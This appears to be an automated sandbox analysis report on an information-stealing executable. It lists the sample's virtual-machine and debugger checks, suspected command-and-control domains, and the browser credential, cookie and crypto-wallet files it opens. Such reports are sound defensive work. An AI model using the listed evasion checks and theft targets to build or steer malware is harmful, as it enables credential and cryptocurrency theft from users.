                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe TID: 5952Thread sleep time: -270000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe TID: 3652Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: LNn56KMkEE.exe, 00000000.00000002.1928183102.000000000067E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.000000000100F000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872601803.000000000100F000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924345681.000000000100F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnH
                Source: LNn56KMkEE.exe, 00000000.00000002.1929021676.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`Z
                Source: LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.000000000100F000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872601803.000000000100F000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001010000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924345681.000000000100F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: LNn56KMkEE.exe, 00000000.00000002.1928183102.000000000067E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: SICE
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: LNn56KMkEE.exe, 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: rapeflowwj.lat
                Source: LNn56KMkEE.exe, 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: crosshuaht.lat
                Source: LNn56KMkEE.exe, 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sustainskelet.lat
                Source: LNn56KMkEE.exe, 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: aspecteirs.lat
                Source: LNn56KMkEE.exe, 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: energyaffai.lat
                Source: LNn56KMkEE.exe, 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: necklacebudi.lat
                Source: LNn56KMkEE.exe, 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: discokeyus.lat
                Source: LNn56KMkEE.exe, 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: grannyejh.lat
                Source: LNn56KMkEE.exe, 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sweepyribs.lat
                Source: LNn56KMkEE.exe, 00000000.00000002.1928183102.000000000067E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: o=xvRProgram Manager
                Source: LNn56KMkEE.exe, 00000000.00000002.1928183102.000000000067E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =xvRProgram Manager
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: LNn56KMkEE.exe, 00000000.00000003.1872542215.000000000101F000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872341899.000000000105D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872273145.000000000588E000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872523469.0000000001070000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872466904.0000000005890000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: LNn56KMkEE.exe PID: 6948, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: LNn56KMkEE.exeString found in binary or memory: %appdata%\Electrum\wallets
                Source: LNn56KMkEE.exeString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: LNn56KMkEE.exeString found in binary or memory: window-state.json
                Source: LNn56KMkEE.exeString found in binary or memory: Wallets/JAXX New Version
                Source: LNn56KMkEE.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: LNn56KMkEE.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: LNn56KMkEE.exeString found in binary or memory: Wallets/Ethereum
                Source: LNn56KMkEE.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: LNn56KMkEE.exeString found in binary or memory: keystore
                Source: LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
